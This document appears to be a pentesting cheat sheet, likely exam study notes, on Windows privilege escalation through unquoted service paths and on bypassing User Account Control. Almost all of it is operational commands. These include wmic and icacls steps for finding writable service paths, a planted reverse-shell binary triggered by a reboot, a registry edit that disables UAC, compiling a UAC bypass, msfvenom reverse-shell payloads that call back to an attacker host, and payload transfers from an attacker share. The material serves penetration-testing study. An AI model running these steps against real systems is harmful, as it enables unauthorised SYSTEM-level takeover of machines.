Unquoted path Manual Exploitation

C:\Program Files directory, which contains a space character in its name.


Finding the correct binary path is possible Under services in Winpeas.

Also you can list the services with

net start
wmic service list brief
sc query
 Services - Unquoted Paths

Path to service is unquoted and has spaces.
Running with LocalSystem or equivalent Administrative permissions.
User should have write permissions to a folder in the path.
User should have permission to start the service OR the service auto-restarts on shutdown/start-up.
Find unquoted paths with WMIC:

Find all services with "auto" start mode (automatically starts at system start-up),
cmd> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
Exploit steps:

Find unquoted service binpaths, for services run as ADMIN e.g. binpath= C:\Program Files\A bad folder\adminservice.exe.

Check if you have FULL/WRITE (F)(W) permissions along path using:

a) icacls "C:\Program Files\folder\A unquoted folder\adminservice.exe"

b) accesschk.exe -ucqv [/path/to/unquoted/folder] -accepteula

Generate reverse shell payload and rename to path e.g. A.exe.

Place malicious binary in path, so that it is executed e.g. move A.exe "C:\Program Files\folder".

Execute by restarting computer (if service has startmode = auto) with shutdown /r /t 0.

User Account Control (UAC) Bypass
Even if you are a local admin, User Account Control (UAC) maybe turned on which may force your user to respond to UAC credential/consent prompts in order to perform privileged actions.

UAC bypass walkthrough: https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/
STEP 1: Check if we should perform UAC bypass

cmd> whoami /priv    # do we have very few privileges even as local admin?
cmd> whoami /groups  # is "Mandatgory Label\XXX Mandatory Level" set to MEDIUM?
cmd> psexec.exe -i -accepteula -d -s rshell.exe # are we getting issues running psexec as SYSTEM?

# check if UAC turned on
cmd> reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA                  REG_DWORD 0x1 # if 0x1 = UAC ENABLED
ConsentPromptBehaviorAdmin REG_DWORD 0x5 # if NOT 0x0 = consent required
PromptOnSecureDesktop      REG_DWORD 0x1 # if 0x1 = Force all credential/consent prompts

# try to disable UAC
cmd> reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD
STEP 2: Prepare exploits

# modify uac-bypass.c to execute reverse shell
# compile w/ correct architecture
$ x86_64-w64-mingw32-gcc ~/OSCP-2022/Tools/privesc-windows/uac-bypass.c -o uac-bypass.exe

# generate reverse shell payload
$  msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=[kali] LPORT=666 -f exe -o rshell.exe
STEP 3: Transfer, setup listener and exec payload

cmd> copy \\[kali]\[share]\uac-bypass.exe uac-bypass.exe
cmd> copy \\[kali]\[share]\rshell.exe rshell.exe
cmd> .\uac-bypass.exe

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f exe > program.exe

Last updated